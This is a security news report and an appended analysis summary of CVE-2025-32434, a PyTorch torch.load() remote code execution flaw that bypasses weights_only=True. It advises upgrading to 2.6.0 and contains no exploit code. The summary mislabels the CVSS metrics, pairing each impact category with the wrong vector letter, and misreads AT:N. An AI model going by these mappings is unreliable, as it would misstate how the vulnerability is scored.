Full Report
A major security flaw has been discovered in PyTorch, the widely used open-source machine learning framework. Identified as CVE-2025-32434, this newly reported PyTorch vulnerability allows attackers to remotely execute arbitrary code on systems that load AI models, even when protective settings like weights_only=True are enabled. This critical vulnerability impacts all PyTorch versions up to and including 2.5.1, according to a security advisory published earlier this week. The issue has been addressed in version 2.6.0, which has been made available through pip. PyTorch Vulnerability Details The root of the issue lies within PyTorch’s torch.load() function, a core component frequently used for loading serialized models. For years, developers have relied on the weights_only=True flag to protect against potentially harmful code embedded in model files. However, that protect has now been proven insufficient. Security researcher Ji’an Zhou demonstrated that the weights_only=True setting can be bypassed, enabling attackers to execute remote commands. This revelation directly contradicts PyTorch's own documentation, which previously recommended the setting as a reliable mitigation method. This issue highlights the evolving nature of ML security," the PyTorch team stated. "We urge all users to update immediately and report suspicious model behavior." Who Is at Risk? Any application, research tool, or cloud service that relies on torch.load() using unpatched PyTorch versions is vulnerable. This includes systems designed for inference, federated learning, and model hub integrations. An attacker could easily upload a tampered model to a public repository or inject it into a software supply chain. When a user loads the compromised model, the exploit would trigger, potentially granting full control over the target system. Given the low complexity and high impact of the attack, security experts have classified the vulnerability as critical. According to GitHub's CVE record, CVE-2025-32434 carries a CVSS 4.0 score of 9.3, placing it firmly in the “Critical” category. The vector string highlights its severity: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N In simpler terms, it requires no special privileges, user interaction, or advanced exploitation techniques, making it especially dangerous for real-world applications. Immediate Actions Recommended The PyTorch team strongly urges all users to take the following steps: Upgrade to PyTorch 2.6.0 immediately using pip install-- upgrade torch. Audit existing AI models, especially those sourced from third-party or public repositories. Monitor official security channels, including the PyTorch GitHub Security page and the related GitHub Advisory (GHSA-53q9-r3pm-6pq6), for updates. Conclusion The discovery of the CVE-2025-32434 PyTorch vulnerability highlights the gaps in the AI community. Even widely trusted machine learning frameworks are not immune to serious security flaws. This critical vulnerability, which affects all PyTorch versions up to 2.5.1, allows remote code execution, even with weights_only=True enabled. To protect systems, users must immediately upgrade to PyTorch 2.6.0, audit existing models—especially those from third-party sources—and closely monitor official security channels.
Analysis Summary
# Vulnerability: Critical PyTorch Flaw Allowing Remote Code Execution
## CVE Details
- CVE ID: CVE-2025-32434
- CVSS Score: 9.3 (Critical)
- CWE: Not explicitly mentioned, but context implies insecure deserialization or code execution related to model loading/weights processing.
## Affected Systems
- Products: PyTorch
- Versions: All versions up to and including 2.5.1
- Configurations: Affects loading of AI models, even when `weights_only=True` is enabled.
## Vulnerability Description
This critical vulnerability allows remote code execution (RCE) within systems utilizing the PyTorch framework for loading AI models. The flaw is severe enough to permit RCE even when security measures like setting `weights_only=True` are enabled during model loading. The vulnerability is exploitable across the network without requiring user interaction or special privileges.
## Exploitation
- Status: Not explicitly stated as 'Exploited in the wild', but implied high risk due to critical score and low complexity.
- Complexity: Low (Based on attack vector CVSS string: AC:L)
- Attack Vector: Network (Based on attack vector CVSS string: AV:N)
## Impact
- Confidentiality: High (VI:H)
- Integrity: High (VA:H)
- Availability: High (VC:H)
*(Note: CVSS vector string breakdown: AV:N (Network), AC:L (Low Complexity), AT:N (No Advanced Techniques required), PR:N (No Privileges Required), UI:N (No User Interaction). VC:H/VI:H/VA:H implies High impact on Confidentiality, Integrity, and Availability for the target host.)*
## Remediation
### Patches
- Upgrade immediately to **PyTorch 2.6.0**.
- Command: `pip install --upgrade torch`
### Workarounds
- Audit existing AI models, focusing specifically on those sourced from third-party or public repositories.
## Detection
- **Indicators of Compromise (IoC):** Not detailed in the provided text.
- **Detection Methods and Tools:** Monitor official security channels for new indicators. Look for unusual process execution originating from Python/PyTorch environments during model loading operations.
## References
- Vendor Advisories: PyTorch GitHub Security page
- Relevant Links:
- GitHub Advisory: GHSA-53q9-r3pm-6pq6 (defanged: `github.com/advisories/GHSA-53q9-r3pm-6pq6`)